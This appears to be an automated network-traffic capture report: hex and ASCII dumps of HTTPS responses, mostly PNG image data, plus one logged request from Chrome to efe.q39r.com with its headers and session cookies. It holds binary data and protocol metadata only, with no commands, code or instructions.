                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a e2 fc 59 e0 15 e0 e5
                                                                                  Data Ascii: G` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEzY
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c 63 a6 ea d8 01 78 81
                                                                                  Data Ascii: $I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0Lcx
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f ed d6 f6 d9 47 45 92
                                                                                  Data Ascii: 6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_GE
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3 5b 89 bf 9e 5b ad b3
                                                                                  Data Ascii: !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&[[
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f e0 96 e8 20 92 16 f0 00 f0
                                                                                  Data Ascii: TvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c 30 31 3a 84 16 eb 2b c0 4a
                                                                                  Data Ascii: ?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<01:+J
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97 52 bd 15 f4 aa 60 14
                                                                                  Data Ascii: /lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|R`
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79 65 72 1b f0 66 e0 5f d1 41 4a 62 7b d2 78 48 92
                                                                                  Data Ascii: o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVyerf_AJb{xH


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.1749773172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1512OUTGET /opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC685INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 29796
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYAL%2BLff%2BJ56pGXTpI7HMVnjfFrVradsI5Z%2FuQIv0zPR4DSkBB5KfTkfsxbcadfUY4PMxAl7mTKR8xLVPjL8ePmDDlLkHuH%2FHR4Cq%2BMntCJjX8GZTuyf%2FQ00emkw9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadafbf72ada6-ATL
                                                                                  2024-04-25 16:23:35 UTC684INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                                                  Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: a1 07 70 e2 f0 3e a9 9c 21 43 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47
                                                                                  Data Ascii: p>!C"))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlG
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 63 c2 4e cc b6 b2 20 50 c3 bb 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30
                                                                                  Data Ascii: cN P3g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 25 34 73 97 fc f8 22 65 f7 d3 a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e
                                                                                  Data Ascii: %4s"e}&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: e6 fd 31 97 7e d8 30 28 08 f3 e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90
                                                                                  Data Ascii: 1~0(#Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: a8 11 ee 8c e8 55 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8
                                                                                  Data Ascii: UNV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`F
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: d2 a5 51 dc 56 18 27 24 66 68 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43
                                                                                  Data Ascii: QV'$fhx{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 5d 43 42 10 97 7e db dd cc cc 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6
                                                                                  Data Ascii: ]CB~&rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 1b 89 09 13 27 72 db b7 6d a3 dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd
                                                                                  Data Ascii: 'rm.j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m
